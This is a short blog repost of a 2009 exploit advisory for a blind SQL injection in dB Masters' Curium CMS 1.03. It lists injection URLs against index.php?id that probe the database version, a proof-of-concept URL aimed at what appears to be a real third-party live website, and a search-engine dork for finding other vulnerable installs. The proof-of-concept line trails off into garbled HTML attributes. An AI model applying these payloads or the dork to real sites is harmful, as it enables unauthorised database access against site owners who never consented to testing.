Home vulnerabilities dB Masters' Curium CMS 1.03 Blind SQL Injection Vuln

dB Masters' Curium CMS 1.03 Blind SQL Injection Vuln

By
Friday, April 24, 2009
Read
Add Comment

[o] dB Masters' Curium CMS 1.03 Blind SQL Injection Vulnerability
Software : dB Masters' Curium CMS version 1.03
Vendor : http://www.dbmasters.net/
Author : NoGe


[o] Vulnerable file
index.php


[o] Exploit
http://localhost/[path]/index.php?id=[SQL]
http://localhost/[path]/index.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/index.php?id=1 and substring(@@version,1,1)=5


[o] Proof Of Concept
http://www.scacheerleaders.com/index.php?id=43%20and%20substring(@@version,1,1)=4 << id="43%20and%20substring(@@version,1,1)=" id="5%20and%20substring(@@version,1,1)=" id="5%20and%20substring(@@version,1,1)=" style="font-weight: bold;">


[o] Dork
"Powered by dB Masters' Curium CMS"

Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us